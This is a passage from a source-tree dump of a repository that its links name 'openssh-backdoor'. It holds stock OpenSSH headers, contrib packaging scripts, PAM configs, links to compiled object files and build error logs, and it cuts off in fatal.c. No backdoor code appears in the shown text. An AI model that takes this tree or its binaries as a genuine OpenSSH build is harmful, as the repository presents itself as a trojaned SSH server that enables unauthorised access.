2001/06/26 17:27:23 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | 15 | const char *get_canonical_hostname(int); 16 | const char *get_remote_ipaddr(void); 17 | const char *get_remote_name_or_ip(u_int, int); 18 | 19 | char *get_peer_ipaddr(int); 20 | int get_peer_port(int); 21 | char *get_local_ipaddr(int); 22 | char *get_local_name(int); 23 | 24 | int get_remote_port(void); 25 | int get_local_port(void); 26 | -------------------------------------------------------------------------------- /canohost.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/canohost.o -------------------------------------------------------------------------------- /channels.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/channels.o -------------------------------------------------------------------------------- /cipher.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/cipher.o -------------------------------------------------------------------------------- /clientloop.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: clientloop.h,v 1.7 2002/04/22 21:04:52 markus Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * 8 | * As far as I am concerned, the code I have written for this software 9 | * can be used freely for any purpose. Any derived versions of this 10 | * software must be clearly marked as such, and if the derived work is 11 | * incompatible with the protocol description in the RFC file, it must be 12 | * called by a name other than "ssh" or "Secure Shell". 13 | */ 14 | /* 15 | * Copyright (c) 2001 Markus Friedl. All rights reserved. 16 | * 17 | * Redistribution and use in source and binary forms, with or without 18 | * modification, are permitted provided that the following conditions 19 | * are met: 20 | * 1. Redistributions of source code must retain the above copyright 21 | * notice, this list of conditions and the following disclaimer. 22 | * 2. Redistributions in binary form must reproduce the above copyright 23 | * notice, this list of conditions and the following disclaimer in the 24 | * documentation and/or other materials provided with the distribution. 25 | * 26 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 27 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 28 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 29 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 30 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 31 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 32 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 33 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 34 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 35 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 36 | */ 37 | 38 | /* Client side main loop for the interactive session. */ 39 | int client_loop(int, int, int); 40 | void client_global_request_reply(int type, u_int32_t seq, void *ctxt); 41 | -------------------------------------------------------------------------------- /clientloop.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/clientloop.o -------------------------------------------------------------------------------- /compat.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/compat.o -------------------------------------------------------------------------------- /compress.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: compress.h,v 1.11 2002/03/04 17:27:39 stevesk Exp $ */ 2 | 3 | /* 4 | * Author: Tatu Ylonen 5 | * Copyright (c) 1995 Tatu Ylonen , Espoo, Finland 6 | * All rights reserved 7 | * Interface to packet compression for ssh. 8 | * 9 | * As far as I am concerned, the code I have written for this software 10 | * can be used freely for any purpose. Any derived versions of this 11 | * software must be clearly marked as such, and if the derived work is 12 | * incompatible with the protocol description in the RFC file, it must be 13 | * called by a name other than "ssh" or "Secure Shell". 14 | */ 15 | 16 | #ifndef COMPRESS_H 17 | #define COMPRESS_H 18 | 19 | void buffer_compress_init_send(int); 20 | void buffer_compress_init_recv(void); 21 | void buffer_compress_uninit(void); 22 | void buffer_compress(Buffer *, Buffer *); 23 | void buffer_uncompress(Buffer *, Buffer *); 24 | 25 | #endif /* COMPRESS_H */ 26 | -------------------------------------------------------------------------------- /compress.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/compress.o -------------------------------------------------------------------------------- /contrib/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | @echo "Valid targets: gnome-ssh-askpass1 gnome-ssh-askpass2" 3 | 4 | gnome-ssh-askpass1: gnome-ssh-askpass1.c 5 | $(CC) `gnome-config --cflags gnome gnomeui` \ 6 | gnome-ssh-askpass1.c -o gnome-ssh-askpass1 \ 7 | `gnome-config --libs gnome gnomeui` 8 | 9 | gnome-ssh-askpass2: gnome-ssh-askpass2.c 10 | $(CC) `pkg-config --cflags gtk+-2.0` \ 11 | gnome-ssh-askpass2.c -o gnome-ssh-askpass2 \ 12 | `pkg-config --libs gtk+-2.0` 13 | 14 | clean: 15 | rm -f *.o gnome-ssh-askpass1 gnome-ssh-askpass2 gnome-ssh-askpass 16 | -------------------------------------------------------------------------------- /contrib/README: -------------------------------------------------------------------------------- 1 | Other patches and addons for OpenSSH. Please send submissions to 2 | djm@mindrot.org 3 | 4 | Externally maintained 5 | --------------------- 6 | 7 | SSH Proxy Command -- connect.c 8 | 9 | Shun-ichi GOTO has written a very useful ProxyCommand 10 | which allows the use of outbound SSH from behind a SOCKS4, SOCKS5 or 11 | https CONNECT style proxy server. His page for connect.c has extensive 12 | documentation on its use as well as compiled versions for Win32. 13 | 14 | http://www.taiyo.co.jp/~gotoh/ssh/connect.html 15 | 16 | 17 | X11 SSH Askpass: 18 | 19 | Jim Knoble has written an excellent X11 20 | passphrase requester. This is highly recommended: 21 | 22 | http://www.ntrnet.net/~jmknoble/software/x11-ssh-askpass/index.html 23 | 24 | 25 | In this directory 26 | ----------------- 27 | 28 | ssh-copy-id: 29 | 30 | Phil Hands' shell script to automate the process of adding 31 | your public key to a remote machine's ~/.ssh/authorized_keys file. 32 | 33 | gnome-ssh-askpass[12]: 34 | 35 | A GNOME and Gtk2 passphrase requesters. Use "make gnome-ssh-askpass1" or 36 | "make gnome-ssh-askpass2" to build. 37 | 38 | sshd.pam.generic: 39 | 40 | A generic PAM config file which may be useful on your system. YMMV 41 | 42 | sshd.pam.freebsd: 43 | 44 | A PAM config file which works with FreeBSD's PAM port. Contributed by 45 | Dominik Brettnacher 46 | 47 | mdoc2man.pl: 48 | 49 | Converts mdoc formated manpages into normal manpages. This can be used 50 | on Solaris machines to provide manpages that are not preformated. 51 | Contributed by Mark D. Roth 52 | 53 | redhat: 54 | 55 | RPM spec file and scripts for building Redhat packages 56 | 57 | suse: 58 | 59 | RPM spec file and scripts for building SuSE packages 60 | 61 | -------------------------------------------------------------------------------- /contrib/aix/README: -------------------------------------------------------------------------------- 1 | Overview: 2 | 3 | This directory contains files to build an AIX native (installp or SMIT 4 | installable) openssh package. 5 | 6 | 7 | Directions: 8 | 9 | (optional) create config.local in your build dir 10 | ./configure [options] 11 | contrib/aix/buildbff.sh 12 | 13 | The file config.local or the environment is read to set the following options 14 | (default first): 15 | PERMIT_ROOT_LOGIN=[no|yes] 16 | X11_FORWARDING=[no|yes] 17 | AIX_SRC=[no|yes] 18 | 19 | Acknowledgements: 20 | 21 | The contents of this directory are based on Ben Lindstrom's Solaris 22 | buildpkg.sh. Ben also supplied inventory.sh. 23 | 24 | Jim Abbey's (GPL'ed) lppbuild-2.1 was used to learn how to build .bff's 25 | and for comparison with the output from this script, however no code 26 | from lppbuild is included and it is not required for operation. 27 | 28 | SRC support based on examples provided by Sandor Sklar and Maarten Kreuger. 29 | 30 | 31 | Other notes: 32 | 33 | The script treats all packages as USR packages (not ROOT+USR when 34 | appropriate). It seems to work, though...... 35 | 36 | If there are any patches to this that have not yet been integrated they 37 | may be found at http://www.zip.com.au/~dtucker/openssh/. 38 | 39 | 40 | Disclaimer: 41 | 42 | It is hoped that it is useful but there is no warranty. If it breaks 43 | you get to keep both pieces. 44 | 45 | 46 | - Darren Tucker (dtucker at zip dot com dot au) 47 | 2002/03/01 48 | -------------------------------------------------------------------------------- /contrib/aix/inventory.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # inventory.sh 4 | # 5 | # Originally written by Ben Lindstrom, modified by Darren Tucker to use perl 6 | # 7 | # This will produce an AIX package inventory file, which looks like: 8 | # 9 | # /usr/local/bin: 10 | # class=apply,inventory,openssh 11 | # owner=root 12 | # group=system 13 | # mode=755 14 | # type=DIRECTORY 15 | # /usr/local/bin/slogin: 16 | # class=apply,inventory,openssh 17 | # owner=root 18 | # group=system 19 | # mode=777 20 | # type=SYMLINK 21 | # target=ssh 22 | # /usr/local/share/Ssh.bin: 23 | # class=apply,inventory,openssh 24 | # owner=root 25 | # group=system 26 | # mode=644 27 | # type=FILE 28 | # size=VOLATILE 29 | # checksum=VOLATILE 30 | 31 | find . ! -name . -print | perl -ne '{ 32 | chomp; 33 | if ( -l $_ ) { 34 | ($dev,$ino,$mod,$nl,$uid,$gid,$rdev,$sz,$at,$mt,$ct,$bsz,$blk)=lstat; 35 | } else { 36 | ($dev,$ino,$mod,$nl,$uid,$gid,$rdev,$sz,$at,$mt,$ct,$bsz,$blk)=stat; 37 | } 38 | 39 | # Start to display inventory information 40 | $name = $_; 41 | $name =~ s|^.||; # Strip leading dot from path 42 | print "$name:\n"; 43 | print "\tclass=apply,inventory,openssh\n"; 44 | print "\towner=root\n"; 45 | print "\tgroup=system\n"; 46 | printf "\tmode=%lo\n", $mod & 07777; # Mask perm bits 47 | 48 | if ( -l $_ ) { 49 | # Entry is SymLink 50 | print "\ttype=SYMLINK\n"; 51 | printf "\ttarget=%s\n", readlink($_); 52 | } elsif ( -f $_ ) { 53 | # Entry is File 54 | print "\ttype=FILE\n"; 55 | print "\tsize=$sz\n"; 56 | print "\tchecksum=VOLATILE\n"; 57 | } elsif ( -d $_ ) { 58 | # Entry is Directory 59 | print "\ttype=DIRECTORY\n"; 60 | } 61 | }' 62 | -------------------------------------------------------------------------------- /contrib/caldera/openssh.spec: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/contrib/caldera/openssh.spec -------------------------------------------------------------------------------- /contrib/caldera/ssh-host-keygen: -------------------------------------------------------------------------------- 1 | #! /bin/sh 2 | # 3 | # $Id: ssh-host-keygen,v 1.1 2001/04/27 05:50:50 tim Exp $ 4 | # 5 | # This script is normally run only *once* for a given host 6 | # (in a given period of time) -- on updates/upgrades/recovery 7 | # the ssh_host_key* files _should_ be retained! Otherwise false 8 | # "man-in-the-middle-attack" alerts will frighten unsuspecting 9 | # clients... 10 | 11 | keydir=@sysconfdir@ 12 | keygen=@sshkeygen@ 13 | 14 | if [ -f $keydir/ssh_host_key -o \ 15 | -f $keydir/ssh_host_key.pub ]; then 16 | echo "You already have an SSH1 RSA host key in $keydir/ssh_host_key." 17 | else 18 | echo "Generating 1024 bit SSH1 RSA host key." 19 | $keygen -b 1024 -t rsa1 -f $keydir/ssh_host_key -C '' -N '' 20 | fi 21 | 22 | if [ -f $keydir/ssh_host_rsa_key -o \ 23 | -f $keydir/ssh_host_rsa_key.pub ]; then 24 | echo "You already have an SSH2 RSA host key in $keydir/ssh_host_rsa_key." 25 | else 26 | echo "Generating 1024 bit SSH2 RSA host key." 27 | $keygen -b 1024 -t rsa -f $keydir/ssh_host_rsa_key -C '' -N '' 28 | fi 29 | 30 | if [ -f $keydir/ssh_host_dsa_key -o \ 31 | -f $keydir/ssh_host_dsa_key.pub ]; then 32 | echo "You already have an SSH2 DSA host key in $keydir/ssh_host_dsa_key." 33 | else 34 | echo "Generating SSH2 DSA host key." 35 | $keygen -t dsa -f $keydir/ssh_host_dsa_key -C '' -N '' 36 | fi 37 | -------------------------------------------------------------------------------- /contrib/caldera/sshd.pam: -------------------------------------------------------------------------------- 1 | #%PAM-1.0 2 | auth required /lib/security/pam_pwdb.so shadow nodelay 3 | auth required /lib/security/pam_nologin.so 4 | account required /lib/security/pam_pwdb.so 5 | password required /lib/security/pam_cracklib.so 6 | password required /lib/security/pam_pwdb.so shadow nullok use_authtok 7 | session required /lib/security/pam_pwdb.so 8 | session required /lib/security/pam_limits.so 9 | -------------------------------------------------------------------------------- /contrib/hpux/README: -------------------------------------------------------------------------------- 1 | README for OpenSSH HP-UX contrib files 2 | Kevin Steves 3 | 4 | sshd: configuration file for sshd.rc 5 | sshd.rc: SSH startup script 6 | egd: configuration file for egd.rc 7 | egd.rc: EGD (entropy gathering daemon) startup script 8 | 9 | To install: 10 | 11 | sshd.rc: 12 | 13 | o Verify paths in sshd.rc match your local installation 14 | (WHAT_PATH and WHAT_PID) 15 | o Customize sshd if needed (SSHD_ARGS) 16 | o Install: 17 | 18 | # cp sshd /etc/rc.config.d 19 | # chmod 444 /etc/rc.config.d/sshd 20 | # cp sshd.rc /sbin/init.d 21 | # chmod 555 /sbin/init.d/sshd.rc 22 | # ln -s /sbin/init.d/sshd.rc /sbin/rc1.d/K100sshd 23 | # ln -s /sbin/init.d/sshd.rc /sbin/rc2.d/S900sshd 24 | 25 | egd.rc: 26 | 27 | o Verify egd.pl path in egd.rc matches your local installation 28 | (WHAT_PATH) 29 | o Customize egd if needed (EGD_ARGS and EGD_LOG) 30 | o Add pseudo account: 31 | 32 | # groupadd egd 33 | # useradd -g egd egd 34 | # mkdir -p /etc/opt/egd 35 | # chown egd:egd /etc/opt/egd 36 | # chmod 711 /etc/opt/egd 37 | 38 | o Install: 39 | 40 | # cp egd /etc/rc.config.d 41 | # chmod 444 /etc/rc.config.d/egd 42 | # cp egd.rc /sbin/init.d 43 | # chmod 555 /sbin/init.d/egd.rc 44 | # ln -s /sbin/init.d/egd.rc /sbin/rc1.d/K600egd 45 | # ln -s /sbin/init.d/egd.rc /sbin/rc2.d/S400egd 46 | -------------------------------------------------------------------------------- /contrib/hpux/egd: -------------------------------------------------------------------------------- 1 | # EGD_START: Set to 1 to start entropy gathering daemon 2 | # EGD_ARGS: Command line arguments to pass to egd 3 | # EGD_LOG: EGD stdout and stderr log file (default /etc/opt/egd/egd.log) 4 | # 5 | # To configure the egd environment: 6 | 7 | # groupadd egd 8 | # useradd -g egd egd 9 | # mkdir -p /etc/opt/egd 10 | # chown egd:egd /etc/opt/egd 11 | # chmod 711 /etc/opt/egd 12 | 13 | EGD_START=1 14 | EGD_ARGS='/etc/opt/egd/entropy' 15 | EGD_LOG= 16 | -------------------------------------------------------------------------------- /contrib/hpux/sshd: -------------------------------------------------------------------------------- 1 | # SSHD_START: Set to 1 to start SSH daemon 2 | # SSHD_ARGS: Command line arguments to pass to sshd 3 | # 4 | SSHD_START=1 5 | SSHD_ARGS= 6 | -------------------------------------------------------------------------------- /contrib/redhat/gnome-ssh-askpass.csh: -------------------------------------------------------------------------------- 1 | setenv SSH_ASKPASS /usr/libexec/openssh/gnome-ssh-askpass 2 | -------------------------------------------------------------------------------- /contrib/redhat/gnome-ssh-askpass.sh: -------------------------------------------------------------------------------- 1 | SSH_ASKPASS=/usr/libexec/openssh/gnome-ssh-askpass 2 | export SSH_ASKPASS 3 | -------------------------------------------------------------------------------- /contrib/redhat/sshd.pam: -------------------------------------------------------------------------------- 1 | #%PAM-1.0 2 | auth required /lib/security/pam_stack.so service=system-auth 3 | auth required /lib/security/pam_nologin.so 4 | account required /lib/security/pam_stack.so service=system-auth 5 | password required /lib/security/pam_stack.so service=system-auth 6 | session required /lib/security/pam_stack.so service=system-auth 7 | session required /lib/security/pam_limits.so 8 | session optional /lib/security/pam_console.so 9 | -------------------------------------------------------------------------------- /contrib/redhat/sshd.pam.old: -------------------------------------------------------------------------------- 1 | #%PAM-1.0 2 | auth required /lib/security/pam_pwdb.so shadow nodelay 3 | auth required /lib/security/pam_nologin.so 4 | account required /lib/security/pam_pwdb.so 5 | password required /lib/security/pam_cracklib.so 6 | password required /lib/security/pam_pwdb.so shadow nullok use_authtok 7 | session required /lib/security/pam_pwdb.so 8 | session required /lib/security/pam_limits.so 9 | -------------------------------------------------------------------------------- /contrib/solaris/README: -------------------------------------------------------------------------------- 1 | The following is a new package build script for Solaris. This is being 2 | introduced into OpenSSH 3.0 and above in hopes of simplifying the build 3 | process. As of 3.1p2 the script should work on all platforms that have 4 | SVR4 style package tools. 5 | 6 | The build process is called a 'dummy install'.. Which means the software does 7 | a "make install-nokeys DESTDIR=[fakeroot]". This way all manpages should 8 | be handled correctly and key are defered until the first time the sshd 9 | is started. 10 | 11 | Directions: 12 | 13 | 1. make -F Makefile.in distprep (Only if you are getting from the CVS tree) 14 | 2. ./configure --with-pam [..any other options you want..] 15 | 3. look at the top of contrib/solaris/buildpkg.sh for the configurable options. 16 | 4. ./contrib/solaris/buildpkg.sh 17 | 18 | If all goes well you should have a solaris package ready to be installed. 19 | 20 | If you have any problems with this script please post them to 21 | openssh-unix-dev@mindrot.org and I will try to assist you as best as I can. 22 | 23 | - Ben Lindstrom 24 | 25 | -------------------------------------------------------------------------------- /contrib/solaris/opensshd.in: -------------------------------------------------------------------------------- 1 | #!/sbin/sh 2 | # Donated code that was put under PD license. 3 | # 4 | # Stripped PRNGd out of it for the time being. 5 | 6 | umask 022 7 | 8 | CAT=/usr/bin/cat 9 | KILL=/usr/bin/kill 10 | 11 | prefix=%%openSSHDir%% 12 | etcdir=%%configDir%% 13 | piddir=%%pidDir%% 14 | 15 | SSHD=$prefix/sbin/sshd 16 | PIDFILE=$piddir/sshd.pid 17 | SSH_KEYGEN=$prefix/bin/ssh-keygen 18 | HOST_KEY_RSA1=$etcdir/ssh_host_key 19 | HOST_KEY_DSA=$etcdir/ssh_host_dsa_key 20 | HOST_KEY_RSA=$etcdir/ssh_host_rsa_key 21 | 22 | 23 | checkkeys() { 24 | if [ ! -f $HOST_KEY_RSA1 ]; then 25 | ${SSH_KEYGEN} -t rsa1 -f ${HOST_KEY_RSA1} -N "" 26 | fi 27 | if [ ! -f $HOST_KEY_DSA ]; then 28 | ${SSH_KEYGEN} -t dsa -f ${HOST_KEY_DSA} -N "" 29 | fi 30 | if [ ! -f $HOST_KEY_RSA ]; then 31 | ${SSH_KEYGEN} -t rsa -f ${HOST_KEY_RSA} -N "" 32 | fi 33 | } 34 | 35 | stop_service() { 36 | if [ -r $PIDFILE -a ! -z ${PIDFILE} ]; then 37 | PID=`${CAT} ${PIDFILE}` 38 | fi 39 | if [ ${PID:=0} -gt 1 -a ! "X$PID" = "X " ]; then 40 | ${KILL} ${PID} 41 | else 42 | echo "Unable to read PID file" 43 | fi 44 | } 45 | 46 | start_service() { 47 | # XXX We really should check if the service is already going, but 48 | # XXX we will opt out at this time. - Bal 49 | 50 | # Check to see if we have keys that need to be made 51 | checkkeys 52 | 53 | # Start SSHD 54 | echo "starting $SSHD... \c" ; $SSHD 55 | 56 | sshd_rc=$? 57 | if [ $sshd_rc -ne 0 ]; then 58 | echo "$0: Error ${sshd_rc} starting ${SSHD}... bailing." 59 | exit $sshd_rc 60 | fi 61 | echo done. 62 | } 63 | 64 | case $1 in 65 | 66 | 'start') 67 | start_service 68 | ;; 69 | 70 | 'stop') 71 | stop_service 72 | ;; 73 | 74 | 'restart') 75 | stop_service 76 | start_service 77 | ;; 78 | 79 | *) 80 | echo "$0: usage: $0 {start|stop|restart}" 81 | ;; 82 | esac 83 | -------------------------------------------------------------------------------- /contrib/ssh-copy-id: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Shell script to install your identity.pub on a remote machine 4 | # Takes the remote machine name as an argument. 5 | # Obviously, the remote machine must accept password authentication, 6 | # or one of the other keys in your ssh-agent, for this to work. 7 | 8 | ID_FILE="${HOME}/.ssh/identity.pub" 9 | 10 | if [ "-i" = "$1" ]; then 11 | shift 12 | # check if we have 2 parameters left, if so the first is the new ID file 13 | if [ -n "$2" ]; then 14 | if expr "$1" : ".*\.pub" ; then 15 | ID_FILE="$1" 16 | else 17 | ID_FILE="$1.pub" 18 | fi 19 | shift # and this should leave $1 as the target name 20 | fi 21 | else 22 | if [ x$SSH_AUTH_SOCK != x ] ; then 23 | GET_ID="$GET_ID ssh-add -L" 24 | fi 25 | fi 26 | 27 | if [ -z "`eval $GET_ID`" -a -r "${ID_FILE}" ] ; then 28 | GET_ID="cat ${ID_FILE}" 29 | fi 30 | 31 | if [ -z "`eval $GET_ID`" ]; then 32 | echo "$0: ERROR: No identities found" >&2 33 | exit 1 34 | fi 35 | 36 | if [ "$#" -lt 1 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then 37 | echo "Usage: $0 [-i [identity_file]] [user@]machine" >&2 38 | exit 1 39 | fi 40 | 41 | { eval "$GET_ID" ; } | ssh $1 "umask 077; test -d .ssh || mkdir .ssh ; cat >> .ssh/authorized_keys" 42 | 43 | cat < 19 | * 20 | */ 21 | 22 | #ifndef _DEATTACK_H 23 | #define _DEATTACK_H 24 | 25 | /* Return codes */ 26 | #define DEATTACK_OK 0 27 | #define DEATTACK_DETECTED 1 28 | 29 | int detect_attack(u_char *, u_int32_t, u_char[8]); 30 | #endif 31 | -------------------------------------------------------------------------------- /deattack.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/deattack.o -------------------------------------------------------------------------------- /dh.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: dh.h,v 1.7 2001/06/26 17:27:23 markus Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 2000 Niels Provos. All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | #ifndef DH_H 27 | #define DH_H 28 | 29 | struct dhgroup { 30 | int size; 31 | BIGNUM *g; 32 | BIGNUM *p; 33 | }; 34 | 35 | DH *choose_dh(int, int, int); 36 | DH *dh_new_group_asc(const char *, const char *); 37 | DH *dh_new_group(BIGNUM *, BIGNUM *); 38 | DH *dh_new_group1(void); 39 | 40 | void dh_gen_key(DH *, int); 41 | int dh_pub_is_valid(DH *, BIGNUM *); 42 | 43 | int dh_estimate(int); 44 | 45 | #define DH_GRP_MIN 1024 46 | #define DH_GRP_MAX 8192 47 | 48 | #endif 49 | -------------------------------------------------------------------------------- /dh.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/dh.o -------------------------------------------------------------------------------- /dispatch.h: -------------------------------------------------------------------------------- 1 | /* $OpenBSD: dispatch.h,v 1.9 2002/01/11 13:39:36 markus Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 2000 Markus Friedl. All rights reserved. 5 | * 6 | * Redistribution and use in source and binary forms, with or without 7 | * modification, are permitted provided that the following conditions 8 | * are met: 9 | * 1. Redistributions of source code must retain the above copyright 10 | * notice, this list of conditions and the following disclaimer. 11 | * 2. Redistributions in binary form must reproduce the above copyright 12 | * notice, this list of conditions and the following disclaimer in the 13 | * documentation and/or other materials provided with the distribution. 14 | * 15 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 16 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 17 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 18 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 19 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 20 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 21 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 22 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 23 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 24 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 25 | */ 26 | enum { 27 | DISPATCH_BLOCK, 28 | DISPATCH_NONBLOCK 29 | }; 30 | 31 | typedef void dispatch_fn(int, u_int32_t, void *); 32 | 33 | void dispatch_init(dispatch_fn *); 34 | void dispatch_set(int, dispatch_fn *); 35 | void dispatch_range(u_int, u_int, dispatch_fn *); 36 | void dispatch_run(int, int *, void *); 37 | void dispatch_protocol_error(int, u_int32_t, void *); 38 | void dispatch_protocol_ignore(int, u_int32_t, void *); 39 | -------------------------------------------------------------------------------- /dispatch.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/dispatch.o -------------------------------------------------------------------------------- /entropy.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999-2000 Damien Miller. All rights reserved. 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions 6 | * are met: 7 | * 1. Redistributions of source code must retain the above copyright 8 | * notice, this list of conditions and the following disclaimer. 9 | * 2. Redistributions in binary form must reproduce the above copyright 10 | * notice, this list of conditions and the following disclaimer in the 11 | * documentation and/or other materials provided with the distribution. 12 | * 13 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 14 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 15 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 16 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 17 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 18 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 19 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 20 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 21 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 22 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | */ 24 | 25 | /* $Id: entropy.h,v 1.4 2001/02/09 01:55:36 djm Exp $ */ 26 | 27 | #ifndef _RANDOMS_H 28 | #define _RANDOMS_H 29 | 30 | void seed_rng(void); 31 | void init_rng(void); 32 | 33 | #endif /* _RANDOMS_H */ 34 | -------------------------------------------------------------------------------- /entropy.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/entropy.o -------------------------------------------------------------------------------- /error_log: -------------------------------------------------------------------------------- 1 | make[1]: *** wait: No child processes. Stop. 2 | make[1]: *** Waiting for unfinished jobs.... 3 | make[1]: *** wait: No child processes. Stop. 4 | make: *** [openbsd-compat/libopenbsd-compat.a] Error 2 5 | -------------------------------------------------------------------------------- /error_log.1: -------------------------------------------------------------------------------- 1 | ./configure: line 19076: openbsd-compat/dmesgd.h: No such file or directory 2 | -------------------------------------------------------------------------------- /fatal.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2002 Markus Friedl. All rights reserved. 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following 